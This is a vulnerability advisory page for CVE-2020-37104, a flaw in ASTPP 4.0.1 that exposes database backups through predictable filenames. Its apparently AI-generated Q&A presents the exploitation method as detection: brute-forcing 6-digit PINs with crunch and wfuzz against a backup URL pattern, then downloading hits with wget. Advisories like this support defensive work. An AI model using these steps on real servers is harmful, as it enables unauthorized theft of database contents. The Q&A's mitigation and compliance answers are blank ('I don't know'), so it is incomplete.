CVE-2020-37104
Information Disclosure in ASTPP 4.0.1 via Predictable Backup Files
Publication date: 2026-02-11
Last updated on: 2026-02-20
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| inextrix | astpp | 4.0.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-538 | The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
ASTPP version 4.0.1 contains an information disclosure vulnerability that allows unauthenticated attackers to download database backup files by predicting the backup filename patterns.
The backup files are saved in a directory with filenames that include a timestamp and a 6-digit numeric PIN representing the time, which is semi-predictable.
Attackers can generate a list of all possible 6-digit PIN combinations and use fuzzing tools to try these against the backup download URL to find valid backup filenames.
Once a valid filename is found, the attacker can download the database backup file without any authentication, leading to unauthorized access to sensitive database information.
How can this vulnerability impact me? :
This vulnerability allows attackers to exfiltrate sensitive database information without any authentication.
Since the database backup files can be downloaded by guessing filenames, confidential data stored in the database can be exposed to unauthorized parties.
This can lead to data breaches, loss of confidentiality, and potential misuse of sensitive information contained in the database backups.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by fuzzing the backup download URL to identify valid database backup files with predictable filenames.
- Generate a list of all 6-digit numeric PIN combinations (000000 to 999999) using a tool like crunch.
- Use a web fuzzing tool such as wfuzz to iterate through the PIN list and request URLs of the form http://target/database_backup/astpp_YYYYMMDDFUZZ.sql.gz.
- Check for HTTP 200 responses from the server, which indicate valid backup filenames.
- Once a valid filename is identified, download the backup file using wget or a similar tool.
What immediate steps should I take to mitigate this vulnerability?
I don't know